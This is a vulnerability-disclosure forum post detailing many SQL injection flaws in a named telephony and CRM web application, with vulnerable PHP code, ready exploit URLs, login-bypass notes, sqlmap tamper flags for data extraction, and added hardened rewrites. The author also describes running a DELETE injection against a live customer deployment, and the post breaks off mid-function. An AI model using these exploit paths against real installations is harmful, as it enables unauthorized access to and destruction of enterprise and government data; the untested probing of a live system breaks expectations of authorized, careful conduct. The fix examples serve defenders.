HanDs
Administrator

[July Vulnerability Disclosure] Digging into the 集时通讯 (Jishi Tongxun) software: a bundle of SQL injections

Details:

Vendor site: http://**.**.**.**; the vendor has several branch companies. Some of the existing cases can be seen here: http://**.**.**.**/bugs/wooyun-2010-0134587

[Screenshot: 1.png]

The vendor has a large customer base: major enterprises, government agencies, and so on.



1. Vulnerability location: userweb/php/index/user.class.php

This program's default environment has GPC (magic_quotes_gpc) enabled, so we focus on the positions that are not protected by single quotes.

Code:
    public function showselectExten( )
    {
        $db = $this->loadDB( );
        $pid = empty( $_REQUEST['depart_id'] ) ? "" : $_REQUEST['depart_id'];
        $exten_list = $this->getUsersByDeparts( $pid );
        $this->Tmpl['exten_list'] = $exten_list;
        $this->display( );
    }

The point of interest is the $pid parameter, so we follow it into the getUsersByDeparts function.

This function lives in the base class:

Code:
    public function getUsersByDeparts( $pdepart_id )
    {
        $db = $this->loadDB( );
        $pdepart_ids = $this->getCdepart_id( $pdepart_id );
        $pdepart_ids = substr( $pdepart_ids, 0, -1 );
        if ( empty( $pdepart_id ) )
        {
            $sql = "SELECT * FROM org_user";
        }
        else
        {
            $sql = "SELECT * FROM org_user WHERE dept_id in (".$pdepart_ids.") ";
        }
        $rs = $db->Execute( $sql );
        $users = array( );
        while ( !$rs->EOF )
        {
            $users[] = $rs->fields;
            $rs->MoveNext( );
        }
        return $users;
    }

At $pdepart_ids = $this->getCdepart_id( $pdepart_id ); we see the parameter $pdepart_id being passed into getCdepart_id, so we continue into getCdepart_id:

Code:
    public function getCdepart_id( $pdepart_id )
    {
        $db = $this->loadDB( );
        global $pdepart_id_str;
        $sql = "SELECT dept_id FROM org_department WHERE dept_parent='".$pdepart_id."'";
        $rs = $db->Execute( $sql );
        while ( $rs && !$rs->EOF )
        {
            $this->getCdepart_id( $rs->fields['dept_id'] );
            $rs->MoveNext( );
        }
        $pdepart_id_str .= $pdepart_id.",";
        return $pdepart_id_str;
    }

This has no effect on us; it merely appends a comma after $pdepart_id. Now back to getUsersByDeparts():

The vulnerable statement is:

Code:
    $sql = "SELECT * FROM org_user WHERE dept_id in (".$pdepart_ids.") ";

Most functions call $this->publicCheckLogin( ); to verify permissions, but this one does not, so it can be reached without logging in. The constructed URL is:

/userweb/index.php?module=user&action=selectExten&depart_id=1

[Screenshot: 1.png]

The default configuration of this system runs with DBA privileges; we feed it to sqlmap.

[Screenshot: 2.png]

[Screenshot: 3.png]
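As an added example, not the vendor's code, here is how this chain can be hardened. Three changes close it: restore the publicCheckLogin() call that the page says the other actions make, validate that depart_id is an integer before it is used, and build the IN (...) list from bound placeholders instead of from a concatenated string. The same three changes apply to the other IN (...) sites in this report (showGetCanAdjustExten, showAjaxGetExtensByDept, showGetExtensionComboByDept, showDelete, showDaPingNotify). The class names and the GetCol()/GetAll($sql, $params) calls are assumptions: they are the ADOdb-style methods consistent with the Execute/EOF/MoveNext usage on this page, and publicCheckLogin() is the base-class check named in the text.

```php
<?php
// Added example, not the vendor's code: a hardened rewrite of the
// showselectExten -> getUsersByDeparts -> getCdepart_id chain (PHP 7.1+).
// Assumptions: $db exposes the ADOdb-style methods GetAll($sql, $params)
// and GetCol($sql, $params); publicCheckLogin() is the base-class check the
// page says the other actions call; department ids are integers.

class UserController extends BaseController   // class names are hypothetical
{
    public function showselectExten()
    {
        // 1. Restore the authentication check the original action omitted.
        $this->publicCheckLogin();

        // 2. Validate the type before the value goes anywhere near SQL.
        //    FILTER_VALIDATE_INT rejects lists, spaces and empty strings;
        //    an absent, non-numeric or zero id means "all departments",
        //    which matches the original empty() behaviour.
        $pid = filter_var($_REQUEST['depart_id'] ?? '', FILTER_VALIDATE_INT);
        $pid = ($pid === false || $pid === 0) ? null : $pid;

        $this->Tmpl['exten_list'] = $this->getUsersByDeparts($pid);
        $this->display();
    }

    /** Users of department $pid and all of its sub-departments. */
    public function getUsersByDeparts(?int $pid): array
    {
        $db = $this->loadDB();
        if ($pid === null) {
            return $db->GetAll("SELECT * FROM org_user");
        }

        // Collect the subtree as an array of ints, not as a string fragment.
        $ids = $this->collectDepartmentIds($db, $pid, []);

        // One '?' per id: the driver binds each value, so the IN list is
        // built from placeholders, never from request data.
        $placeholders = implode(',', array_fill(0, count($ids), '?'));
        $sql = "SELECT * FROM org_user WHERE dept_id IN ($placeholders)";
        return $db->GetAll($sql, $ids);
    }

    /** Depth-first collection of $pid and every descendant department id. */
    private function collectDepartmentIds($db, int $pid, array $seen): array
    {
        if (isset($seen[$pid])) {          // guard against cyclic parent links
            return [];
        }
        $seen[$pid] = true;
        $ids = [$pid];
        $children = $db->GetCol(
            "SELECT dept_id FROM org_department WHERE dept_parent = ?", [$pid]);
        foreach ($children as $child) {
            $ids = array_merge($ids,
                $this->collectDepartmentIds($db, (int)$child, $seen));
        }
        return $ids;
    }
}
```

The recursion keeps the original's behaviour of including the parent and every descendant, but returns ints rather than appending to a global string, so the caller never has to trim a trailing comma and never concatenates request data into SQL.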





2. Vulnerable file: Userweb/php/outbound/ajax.class.php

Code:
    public function showGetQuestion( )
    {
        $qnid = $_REQUEST['qnid'];
        $array = array( );
        $array = $this->getQuestionList( $qnid );
        echo json_encode( $array );
        exit( );
    }

$qnid is user-controlled; look at the getQuestionList function:

Code:
    protected function getQuestionList($qnid) {
        $db = $this->loadDB();
        $sql = "select * from stdout_question where is_deleted=0 and qnid=$qnid order by orderid asc";
        $rs = $db->Execute($sql);
        $list = array();
        while (!$rs->EOF) {
            $list[$rs->fields['id']] = $rs->fields;
            $rs->MoveNext();
        }
        return $list;
    }

It goes straight into the SQL statement, unprotected by single quotes, so GPC is bypassed. The constructed URL:

userweb/outbound.php?module=ajax&action=GetQuestion&qnid=1

[Screenshot: 5.png]

[Screenshot: 6.png]
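As an added example, not the vendor's code, this is the hardened form of the showGetQuestion / getQuestionList pair. The two changes, validate the type and bind the value, are the same ones needed for every single-integer parameter in this report (qid, object_id, parentid, id, ivr_id, loginId, dept_id and so on): a numeric comparison such as qnid=$qnid is never protected by magic_quotes_gpc or addslashes(), because no quote has to be broken out of. The class name and the requireIntParam() helper are my additions; Execute($sql, $params) with '?' placeholders is the ADOdb-style binding consistent with the Execute/EOF/MoveNext calls on this page, and publicCheckLogin() is the base-class check named in the text.

```php
<?php
// Added example, not the vendor's code: a hardened version of
// showGetQuestion -> getQuestionList (PHP 7.0+).
// Assumptions: $db exposes the ADOdb-style Execute($sql, $params) with '?'
// placeholders; publicCheckLogin() is the base-class login check the page
// says other actions call; the class name is hypothetical.

class AjaxController extends OutboundBase
{
    /** Read an integer request parameter or stop with an empty JSON reply. */
    private function requireIntParam(string $name): int
    {
        $value = filter_var($_REQUEST[$name] ?? '', FILTER_VALIDATE_INT);
        if ($value === false) {
            header('Content-Type: application/json');
            http_response_code(400);
            echo json_encode([]);      // same shape the client already expects
            exit();
        }
        return $value;
    }

    public function showGetQuestion()
    {
        $this->publicCheckLogin();          // the check the original omitted
        $qnid = $this->requireIntParam('qnid');

        header('Content-Type: application/json');
        echo json_encode($this->getQuestionList($qnid));
        exit();
    }

    protected function getQuestionList(int $qnid): array
    {
        $db = $this->loadDB();
        // '?' is a bind placeholder: the driver supplies the value separately
        // from the statement text, so the value cannot alter the query.
        $sql = "SELECT * FROM stdout_question
                 WHERE is_deleted = 0 AND qnid = ?
              ORDER BY orderid ASC";
        $rs = $db->Execute($sql, [$qnid]);

        $list = [];
        if ($rs) {                          // Execute() returns false on error
            while (!$rs->EOF) {
                $list[$rs->fields['id']] = $rs->fields;
                $rs->MoveNext();
            }
        }
        return $list;
    }
}
```

Casting with (int) alone would also stop the injection, but it silently turns garbage into 0; rejecting the request with FILTER_VALIDATE_INT gives a clean 400 that shows up in logs, which is what a defender wants to see when these parameters are being probed.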







3. Vulnerable file: Userweb/php/outbound/ajax.class.php

Code:
    public function showGetQuestionOptions( )
    {
        $qid = $_REQUEST['qid'];
        $array = array( );
        $array = $this->getQuestionOptionList( $qid );
        echo json_encode( $array );
        exit( );
    }

Look at the getQuestionOptionList function:

Code:
    protected function getQuestionOptionList($qid) {
        $db = $this->loadDB();
        $sql = "select * from stdout_question_options where qid=$qid order by id asc";
        $rs = $db->Execute($sql);
        $list = array();
        while (!$rs->EOF) {
            $list[] = $rs->fields;
            $rs->MoveNext();
        }
        return $list;
    }

Same as above; the constructed URL:

userweb/outbound.php?module=ajax&action=GetQuestionOptions&qid=1

[Screenshot: 8.png]

[Screenshot: 9.png]





4. Vulnerable file: Userweb/php/outbound/ajax.class.php

Code:
    public function showGetObjectList( )
    {
        $db = $this->loadDB( );
        $object_id = $_REQUEST['object_id'];
        $type = $_REQUEST['type'];
        if ( empty( $object_id ) )
        {
            echo "0";
            exit( );
        }
        $list = $this->getObjectList( $object_id, $type );
        echo json_encode( $list );
        exit( );
    }

Look at the getObjectList function:

Code:
    protected function getObjectList($pid, $type = '') {
        $db = $this->loadDB();

        $where = " WHERE o.pid={$pid} AND o.is_hide=0";
        if ('import' == $type) {
            $where .= " AND o.run_status<>'run' ";
        } else if ('preview' == $type) {
            $where .= " AND (o.type1='preview' OR o.run_status<>'run') ";
        } else if ('myPreview' == $type) {
            $where .= " AND o.type1='preview' AND o.run_status<>'pause' ";
        } else if ('forecast' == $type) {
            $where .= " AND o.type1='forecast' ";
        } else if ('ivr' == $type) {
            $where .= " AND o.type1='ivr' ";
        } else if ('quality' == $type) {
            $where .= " AND o.qpid>0 ";
        } else if ('question' == $type) {
            $where .= " AND o.qnid>0 ";
        }

        if ($_SESSION['userinfo']['power'] != 1) {
            $user = $this->getLocalUser();
            $where .= " AND (FIND_IN_SET('" . $user['dept_id'] . "', o.visit_dept) OR o.visit_dept='')";
        }

        if ('myPreview' === $type) {
            $extension = $_SESSION['userinfo']['extension'];
            $sql = "SELECT object_id FROM stdout_agent_object WHERE extension='{$extension}' AND parent_status!='pause'";
            $sql = "SELECT o.id, o.name, o.type1 FROM stdout_object o INNER JOIN ({$sql}) ao ON o.id=ao.object_id {$where} ORDER BY o.id DESC";
        } else {
            $sql = "SELECT o.id, o.name, o.type1 FROM stdout_object o {$where} ORDER BY o.id DESC";
        }
        if (!$rs = $db->Execute($sql)) {
            echo $sql . "<br/>";
            echo $db->ErrorMsg();
            exit();
        }
        $list = array();
        while (!$rs->EOF) {
            $list[$rs->fields['id']] = $rs->fields;
            $rs->MoveNext();
        }
        return $list;
    }

Same problem; the constructed URL is:

userweb/outbound.php?module=ajax&action=GetObjectList&object_id=1

[Screenshot: 10.png]

[Screenshot: 11.png]





5. Vulnerable file: Userweb/php/outbound/ajax.class.php

Code:
    public function showGetProductClass( )
    {
        $db = $this->loadDB( );
        $parentid = $_REQUEST['parentid'];
        if ( empty( $parentid ) )
        {
            echo "0";
            exit( );
        }
        $list = $this->getProductClass( $parentid );
        echo json_encode( $list );
        exit( );
    }

Follow into the getProductClass() function:

Code:
    protected function getProductClass($parentid = 0) {
        $db = $this->loadDB();

        $sql = "SELECT classid, classname FROM stdout_product_class WHERE parentid={$parentid} ORDER BY orderid ASC, classid DESC";
        $rs = $db->Execute($sql);
        $list = array();
        while (!$rs->EOF) {
            $list[$rs->fields['classid']] = $rs->fields;
            $rs->MoveNext();
        }
        return $list;
    }

Same problem, and an obvious one; the constructed URL is:

userweb/outbound.php?module=ajax&action=GetProductClass&parentid=1

[Screenshot: 12.png]

[Screenshot: 13.png]







1. Vulnerable file: Userweb/php/outbound/ajax.class.php

Code:
    public function showGetCanAdjustExten( )
    {
        $db = $this->loadDB( );
        $dept_id = $_REQUEST['dept_id'];
        $sql = "SELECT * FROM org_department";
        $dept = $db->GetAll( $sql );
        $list_depart = $this->getNodeChild( $dept, $dept_id, "dept" );
        $list_depart .= "{$dept_id}";
        $arrFilterExtensions = array( );
        $filter_extensions = $_REQUEST['filter_extensions'];
        if ( !empty( $filter_extensions ) )
        {
            $arrFilterExtensions = explode( ",", $filter_extensions );
        }
        $arrFilterExtensions = array_unique( $arrFilterExtensions );
        $filter_extensions = implode( ",", $arrFilterExtensions );
        $filter_extensions = numbertostring4sql( $filter_extensions );
        $sql = "SELECT extension, user_name FROM org_user WHERE dept_id in (".$list_depart.") AND extension!='' AND extension IS NOT NULL";
        if ( !empty( $filter_extensions ) )
        {
            $sql .= " AND extension NOT IN (".$filter_extensions.")";
        }
        $list = $db->GetAll( $sql );
        echo json_encode( $list );
        exit( );
    }

The constructed URL:

userweb/outbound.php?module=ajax&action=GetCanAdjustExten&dept_id=1

[Screenshot: 1.png]

[Screenshot: 2.png]





2. Vulnerable file: Userweb/php/index/index.class.php

Code:
    public function showAjaxGetExtensByDept( )
    {
        $db = $this->loadDB( );
        $dept_id = $_REQUEST['dept_id'];
        $sql = "SELECT * FROM org_department";
        $dept = $db->GetAll( $sql );
        $list_depart = $this->getNodeChild( $dept, $dept_id, "dept" );
        $list_depart .= "{$dept_id}";
        $sql = "SELECT * FROM org_user WHERE dept_id in (".$list_depart.")";
        $rs = $db->Execute( $sql );
        // ... remainder omitted

The constructed URL is:

userweb/index.php?module=index&action=AjaxGetExtensByDept&dept_id=1

[Screenshot: 3.png]

[Screenshot: 4.png]







3. Vulnerable file: Userweb/php/index/index.class.php

Code:
    public function showGetExtensionComboByDept( )
    {
        $db = $this->loadDB( );
        $dept_id = $_REQUEST['dept_id'];
        $sql = "SELECT * FROM org_department";
        $dept = $db->GetAll( $sql );
        $list_depart = $this->getNodeChild( $dept, $dept_id, "dept" );
        $list_depart .= "{$dept_id}";
        $sql = "SELECT extension, user_name FROM org_user WHERE dept_id in (".$list_depart.")";
        $rs = $db->Execute( $sql );
        // ... remainder omitted

The constructed URL is:

userweb/index.php?module=index&action=GetExtensionComboByDept&dept_id=1

[Screenshot: 5.png]

[Screenshot: 6.png]







4. Vulnerable file: Userweb/php/index/log.class.php

Code:
    public function showExportword( )
    {
        $userinfo = $_SESSION['userinfo'];
        $author_id = $userinfo['extension'];
        $sql = "select a.log_id,a.date,log_type,log_title,log_content from crm_oa_worklog a left join crm_oa_log_attachments b on a.log_id=b.log_id";
        $start_time = strtotime( $_POST['start_date'] );
        $end_time = strtotime( $_POST['end_date'] );
        // ... irrelevant code omitted
        if ( $_POST['log_type'] != 0 )
        {
            $log_type = "`log_type` = ".$_POST['log_type'];
        }
        // ... irrelevant code omitted
        $sql .= " group by a.log_id order by a.date desc ";
        $db = $this->loadDB( );
        // ... remainder omitted

A POST-based injection, unprotected by single quotes, so GPC is bypassed.

The constructed request is as follows:

[Screenshot: 7.png]

Capture the request and feed it to sqlmap:

[Screenshot: 8.png]

[Screenshot: 9.png]

[Screenshot: 10.png]







5. Vulnerable file: Userweb/php/index/log.class.php

Code:
    public function showExport_com_word( )
    {
        $filename = "[filename prefix garbled in source]".date( "Y-m-d", time( ) ).".doc";
        header( "Content-type:application/vnd.ms-word" );
        header( "Content-Disposition:filename=".$filename );
        $sql = "select a.log_id,a.date,log_type,log_title,log_content from crm_oa_worklog a left join crm_oa_log_attachments b on a.log_id=b.log_id";
        $start_time = strtotime( $_POST['start_date'] );
        $end_time = strtotime( $_POST['end_date'] );
        // ... irrelevant code omitted
        if ( $_POST['log_type'] != 0 )
        {
            $log_type = "`log_type` = ".$_POST['log_type'];
        }
        // ... remainder omitted

[Screenshot: 11.png]

Capture the request and feed it to sqlmap:

[Screenshot: 12.png]

[Screenshot: 13.png]







6. Vulnerable file: Userweb/php/index/Outbound.class.php

Code:
    public function showAjaxOptions( )
    {
        varfilter( $_REQUEST );
        extract( $_REQUEST );
        if ( isset( $_REQUEST['topic_id'], $_REQUEST['topic_id'] ) )
        {
            echo 0;
            exit( );
        }
        $db = $this->loadDB( );
        $sql = "SELECT * FROM out_question_topic WHERE id=".$topic_id;
        $row = $db->GetRow( $sql );
        // ... remainder omitted

PHP on Linux is case-sensitive; the programmer wrote varfilter in lowercase where it should have been varFilter, so...

The constructed URL is:

userweb/index.php?module=Outbound&action=AjaxOptions&topic_id=1

[Screenshot: 14.png]

[Screenshot: 15.png]







1. Vulnerable file: Userweb/php/outbound/agent.class.php

Code:
    function showNo()
    {
        $db = $this->loadDB();

        $object_id = varFilter($_REQUEST['object_id']);

        $sql = "select content from stdout_object where id=$object_id";
        $content = $db->GetOne($sql);

        $this->Tmpl['content'] = varResume($content);

        $this->display();
    }

Here we see that $_REQUEST['object_id'] passes through the varFilter function; let's follow it:

Code:
    function varFilter( $fArray )
    {
        if ( is_array( $fArray ) )
        {
            foreach ( $fArray as $_arrykey => $_arryval )
            {
                if ( is_string( $_arryval ) )
                {
                    $fArray[$_arrykey] = trim( nl2br( $fArray[$_arrykey] ) );
                    $fArray[$_arrykey] = htmlspecialchars( $fArray[$_arrykey] );
                    $fArray[$_arrykey] = !get_magic_quotes_gpc( ) ? addslashes( $fArray[$_arrykey] ) : $fArray[$_arrykey];
                    $fArray[$_arrykey] = strip_tags( $fArray[$_arrykey], "<br>" );
                }
                else if ( is_array( $_arryval ) )
                {
                    $fArray[$_arrykey] = varfilter( $_arryval );
                }
            }
            return $fArray;
        }
        $fArray = trim( nl2br( $fArray ) );
        $fArray = htmlspecialchars( $fArray );
        $fArray = !get_magic_quotes_gpc( ) ? addslashes( $fArray ) : $fArray;
        $fArray = strip_tags( $fArray, "<br>" );
        return $fArray;
    }

It is essentially just GPC. Now the vulnerable statement:

Code:
    $sql = "select content from stdout_object where id=$object_id";

It is not protected by single quotes, so it escapes GPC. Most functions call $this->publicCheckLogin(); to check whether the user is logged in, but some were apparently left out, so we can reach them without logging in. This one is a blind injection: because htmlspecialchars filters < > and the like, when feeding it to sqlmap you need to add --tamper=between --time-sec=5, otherwise you only get a proof of concept and no data.

The constructed URL is:

userweb/outbound.php?module=agent&action=No&object_id=1

[Screenshot: 1.png]

[Screenshot: 2.png]







2. Vulnerable file: Userweb/php/outbound/agent.class.php

Code:
    public function showEditTask()
    {
        $db = $this->loadDB();
        $_REQUEST = varFilter($_REQUEST);
        extract($_REQUEST);
        // irrelevant code omitted ...
        $sql = "SELECT SQL_NO_CACHE customer_id, call_status FROM {$table} WHERE id={$task_id}";
        $rowTask = $db->GetRow($sql);
        if (!$rowTask) exit('error.');
        // ... remainder omitted

This one uses variable overwriting:

Code:
    $_REQUEST = varFilter($_REQUEST);
    extract($_REQUEST);

That is the cause: with a GET request carrying table=stdout_task&task_id=2 we can overwrite $table and $task_id directly.

Likewise a blind injection; this position is not protected by single quotes:

Code:
    $sql = "SELECT SQL_NO_CACHE customer_id, call_status FROM {$table} WHERE id={$task_id}";

Note that $table must be a table that actually has the customer_id and call_status columns, otherwise no data comes out. My constructed URL is:

userweb/outbound.php?module=agent&action=EditTask&table=stdout_task&task_id=1

[Screenshot: 3.png]

[Screenshot: 4.png]
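As an added example, not the vendor's code, this is showEditTask rewritten without extract(). It also covers the showAjaxOptions and showAjaxTopic actions in Outbound.class.php and the showQuestion action earlier in this file, which share the same root cause: extract($_REQUEST) turns every request key into a local variable, so values the code treats as server-side state ($table, $task_id, $qnid, $topic_id) are really client input. Two related facts worth knowing when reviewing those sites: PHP function names are case-insensitive, so the lowercase varfilter( $_REQUEST ) call does reach varFilter, but its return value is discarded, so $_REQUEST is left unfiltered; and even when varFilter's result is assigned, as here, htmlspecialchars() and addslashes() cannot protect a numeric comparison or a table name. The class name and the taskTable() helper are my additions; GetRow($sql, $params) is the ADOdb-style binding consistent with the calls on this page, publicCheckLogin() is the base-class check named in the text, and stdout_task is the only table name the page gives.

```php
<?php
// Added example, not the vendor's code: showEditTask without extract()
// (PHP 7.1+ for the class constant).
// Assumptions: $db exposes the ADOdb-style GetRow($sql, $params);
// publicCheckLogin() is the base-class check named on the page; the class
// name is hypothetical, and stdout_task is the only table the page names.

class AgentController extends OutboundBase
{
    /** Tables this action may read. An identifier cannot be bound as a
     *  parameter, so it must be chosen from a fixed list, never from input. */
    private const TASK_TABLES = ['stdout_task' => true];

    /** Pick the task table from server-side state, never from the request. */
    private function taskTable(): string
    {
        $table = 'stdout_task';   // stand-in for whatever the elided code decides
        if (!isset(self::TASK_TABLES[$table])) {
            exit('error.');       // refuse anything outside the whitelist
        }
        return $table;
    }

    public function showEditTask()
    {
        $this->publicCheckLogin();
        $db = $this->loadDB();

        // Read exactly the parameters the action needs, by name. Calling
        // extract() on $_REQUEST lets the client create or overwrite any
        // local variable, which is how $table and $task_id became input.
        $taskId = filter_var($_REQUEST['task_id'] ?? '', FILTER_VALIDATE_INT);
        if ($taskId === false) {
            exit('error.');
        }

        $table = $this->taskTable();
        $sql = "SELECT SQL_NO_CACHE customer_id, call_status FROM `{$table}` WHERE id = ?";
        $rowTask = $db->GetRow($sql, [$taskId]);
        if (!$rowTask) {
            exit('error.');
        }
        // ... the remainder of the action continues with $rowTask
    }
}
```

The whitelist lookup uses the table name as an array key rather than in_array(), so a value like "stdout_task " or a mixed-case variant fails the check instead of matching loosely; the interpolated name is also wrapped in backticks so that even a whitelisted identifier is never parsed as anything but an identifier.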







3. Vulnerable file: Userweb/php/outbound/agent.class.php

Code:
    public function showQuestion()
    {
        $db = $this->loadDB();

        $_REQUEST = varFilter($_REQUEST);
        extract($_REQUEST);
        if (empty($qnid)) {
            goBack(c('操作失败：传参qnid错误.'), 'exit');
        }
        $row_qn = $this->getQn($qnid);
        // ... remainder omitted

Go into the base class to look at getQn, in /php/outbound/public.class.php:

Code:
    function getQn($qnid)
    {
        $db = $this->loadDB();
        $sql = "select * from stdout_qn where id=$qnid";
        $row = $db->GetRow($sql);
        return $row;
    }

Again $qnid is not protected by single quotes, and we can overwrite $qnid through extract($_REQUEST);.

The constructed URL is:

Address: userweb/outbound.php?module=agent&action=Question&qnid=12

[Screenshot: 5.png]

[Screenshot: 6.png]







4. Vulnerable file: Userweb/php/outbound/agent.class.php

Code:
    function showAjaxCheckNextQuestion()
    {
        $db = $this->loadDB();
        $qid = varFilter($_REQUEST['qid']);
        $qnid = varFilter($_REQUEST['qnid']);
        $answer = varFilter($_REQUEST['answer']);
        $row_question = $this->getQuestion($qid);
        echo $this->isExistNextQuestion($row_question, true, $answer) ? 'true' : 'false';
    }

Look directly at the getQuestion function:

Code:
    protected function getQuestion($qid)
    {
        $db = $this->loadDB();
        $sql = "select * from stdout_question where id=$qid and is_deleted=0";
        $row = $db->GetRow($sql);
        return $row;
    }

Again we construct the URL:

Address: userweb/outbound.php?module=agent&action=AjaxCheckNextQuestion&qid=1

[Screenshot: 7.png]

[Screenshot: 8.png]









1. Vulnerable file: Userweb/php/outbound/object.class.php

Code:
    function showObjectPause() {
        $exten_object_id = varFilter($_REQUEST['id']);
        $db = $this->loadDB();
        $sql = "select object_id, run_status from stdout_exten_object where id={$exten_object_id}";
        // ... omitted

The varFilter function:

Code:
    function varFilter( $fArray )
    {
        if ( is_array( $fArray ) )
        {
            foreach ( $fArray as $_arrykey => $_arryval )
            {
                if ( is_string( $_arryval ) )
                {
                    $fArray[$_arrykey] = trim( nl2br( $fArray[$_arrykey] ) );
                    $fArray[$_arrykey] = htmlspecialchars( $fArray[$_arrykey] );
                    $fArray[$_arrykey] = !get_magic_quotes_gpc( ) ? addslashes( $fArray[$_arrykey] ) : $fArray[$_arrykey];
                    $fArray[$_arrykey] = strip_tags( $fArray[$_arrykey], "<br>" );
                }
                else if ( is_array( $_arryval ) )
                {
                    $fArray[$_arrykey] = varfilter( $_arryval );
                }
            }
            return $fArray;
        }
        $fArray = trim( nl2br( $fArray ) );
        $fArray = htmlspecialchars( $fArray );
        $fArray = !get_magic_quotes_gpc( ) ? addslashes( $fArray ) : $fArray;
        $fArray = strip_tags( $fArray, "<br>" );
        return $fArray;
    }

The only restrictions are htmlspecialchars and GPC; there is no single-quote protection here, so GPC is bypassed. When running sqlmap remember to add --tamper=between, otherwise no data comes out.

The constructed URL is:

userweb/outbound.php?module=object&action=ObjectPause&id=1

[Screenshot: 1.png]

[Screenshot: 2.png]





2. Vulnerable file: Userweb/php/outbound/object.class.php

Code:
    function showObjectStop() {
        $exten_object_id = varFilter($_REQUEST['id']);
        $db = $this->loadDB();
        $sql = "select object_id, run_status from stdout_exten_object where id={$exten_object_id}";
        // ... omitted

Same problem as above.

The constructed URL is:

userweb/outbound.php?module=object&action=ObjectStop&id=1

[Screenshot: 3.png]

[Screenshot: 4.png]







3. Vulnerable file: Userweb/php/outbound/report.class.php

Code:
    function showAjaxGetIvrTotal()
    {
        $db = $this->loadDB();
        $_REQUEST = varFilter($_REQUEST);
        $object_id = $_REQUEST['object'];
        $ivr_id = $_REQUEST['ivr_id'];
        $fromdate = $_REQUEST['fromdate'];
        $todate = $_REQUEST['todate'];
        // ... irrelevant code omitted
        $sql = "SELECT * FROM ss_ivr_dests WHERE ivr_id={$ivr_id} ORDER BY selection ASC";
        $rs = $db->GetArray($sql);

The constructed URL: userweb/outbound.php?module=report&action=AjaxGetIvrTotal&ivr_id=1

[Screenshot: 5.png]

[Screenshot: 6.png]







4. Vulnerable file: Userweb/php/index/crmManager.class.php

Code:
    public function showAjaxGetTransferLogDetail( )
    {
        $db = $this->loadDB( );
        $sql = "SELECT content FROM log_customer_transfer WHERE id=".$_REQUEST['id'];
        $content = $db->GetOne( $sql );
        $content = str_replace( "\r\n", "<br/>", $content );
        echo $content;
        exit( );
    }

The constructed URL is:

userweb/index.php?module=crmManager&action=AjaxGetTransferLogDetail&id=1

[Screenshot: 7.png]

[Screenshot: 8.png]







5. Vulnerable file: Userweb/php/index/fieldConfig.class.php

Code:
    function showeditField(){
        if( isset($_GET['id']) && !empty( $_GET['id'] ) ){
            $id = $_GET['id'];
        }else{
            goBack("来路不明","close");
        }
        $db = $this->loadDB();
        $sql = "SELECT * FROM crm_fields_options WHERE id=".$id;
        $field = $db->GetRow( $sql );
        $this->Tmpl['field'] = $field;
        $this->display();
    }

The constructed URL is:

userweb/index.php?module=fieldConfig&action=editField&id=1

[Screenshot: 9.png]

[Screenshot: 10.png]









1. Vulnerable file: Userweb/php/index/log.class.php

Code:
    public function showDelete( )
    {
        $str = $_GET['delete_str'];
        $mark = $_GET['mark'];
        $str = substr_replace( $str, "", -1, 1 );
        $array = explode( ",", $str );
        $j = count( $array );
        $db = $this->loadDB( );
        $i = 0;
        for ( ; $i < $j; ++$i )
        {
            $sqll = "select filename,date from crm_oa_log_attachments where log_id='".$array[$i]."'";
            $result = mysql_query( $sqll );
            while ( $row = mysql_fetch_array( $result ) )
            {
                $row['date'] = date( "Ym", $row['date'] );
                $filename = "data/diary/".$row['date']."/".$row['filename'];
                @unlink( $filename );
            }
        }
        $sql = "DELETE FROM `crm_oa_worklog` WHERE `log_id` in (".$str.")";
        $sq = "DELETE FROM `crm_oa_log_attachments` WHERE `log_id` in (".$str.")";
        $s = "delete from `crm_oa_log_comments` where `log_id` in (".$str.")";
        if ( $db->Execute( $sql ) && $db->Execute( $sq ) && $db->Execute( $s ) )
        {
            goback( c( "删除成功！" ), "index.php?module=log&action=".$mark );
        }
        else
        {
            goback( c( "删除失败!" ) );
        }
    }

The parameter is delete_str. Because this was not practical to set up locally, I ran it against a live case; I checked beforehand and the tables were all empty, otherwise running this DELETE injection would have been a disaster.

The constructed URL is:

userweb/index.php?module=log&action=Delete&delete_str=1

[Screenshot: 1.png]

[Screenshot: 2.png]







2. Vulnerable file: Userweb/php/index/mobileApi.class.php

Code:
    public function showGetSessionsByImUser( )
    {
        $loginId = trim( $_REQUEST['loginId'] );
        $db_mobile = $this->loadDBMobile( );
        $db_mobile->Execute( "SET NAMES UTF8" );
        $sql = "call proc_im_getsessions(".$loginId.");";
        $res = $db_mobile->Execute( $sql );
        // ... remainder omitted

The constructed URL is: userweb/index.php?module=mobileApi&action=GetSessionsByImUser&loginId=1

[Screenshot: 3.png]

[Screenshot: 4.png]







3. Vulnerable file: Userweb/php/index/Outbound.class.php

Code:
    public function showAjaxTopic( )
    {
        varfilter( $_REQUEST );
        extract( $_REQUEST );
        $db = $this->loadDB( );
        if ( isset( $_REQUEST['ques_id'], $_REQUEST['ques_id'] ) )
        {
            echo 0;
            exit( );
        }
        if ( isset( $_REQUEST['topic_id'], $_REQUEST['topic_id'], $_REQUEST['parent_topic_id'], $_REQUEST['parent_topic_id'] ) )
        {
            echo 0;
            exit( );
        }
        $sql = "SELECT id FROM out_question_answer WHERE task_id=".$task_id." AND ques_id={$id} AND custom_contact='{$number}'";
        $quAnsId = $db->GetOne( $sql );
        $sql = "SELECT * FROM out_question_answer_context\r\n\t\t\t\tWHERE task_id=".$task_id." AND ques_id={$id} AND topic_id={$topic_id} AND ques_ans_id={$quAnsId}";
        $answerRow = $db->GetRow( $sql );
        if ( isset( $_REQUEST['parent_topic_id'], $_REQUEST['parent_topic_id'] ) )
        {
            $sql = "SELECT * FROM out_question_topic\r\n WHERE ques_id=".$ques_id." AND parent_topic_id={$parent_topic_id} AND parent_option='{$parent_option}'";
            $row = $db->GetRow( $sql );
            if ( !empty( $row ) )
            {
                $row['m'] = $method;
                $row['parent_id'] = 1;
                $row['answer'] = $answerRow['option_context'];
                $row['other_answer'] = $answerRow['other_answer'];
                echo json_encode( $row );
                exit( );
            }
        }
        $sql = "SELECT * FROM out_question_topic WHERE id=".$topic_id." AND ques_id={$ques_id}";
        $row = $db->GetRow( $sql );
        $row['m'] = $method;
        $row['parent_id'] = 0;
        $row['answer'] = $answerRow['option_context'];
        $row['other_answer'] = $answerRow['other_answer'];
        echo json_encode( $row );
        exit( );
    }

extract( $_REQUEST ); is the function that causes the variable overwriting.

The constructed URL is:

userweb/index.php?module=Outbound&action=AjaxTopic&ques_id=1&topic_id=1&parent_topic_id=1&task_id=1

[Screenshot: 5.png]

[Screenshot: 6.png]

The same applies to the parameters id, topic_id, parent_topic_id and ques_id, four positions in total.





4. Vulnerable file: Userweb/php/index/seatMonitor.class.php

Code:
    function showDaPingNotify()
    {
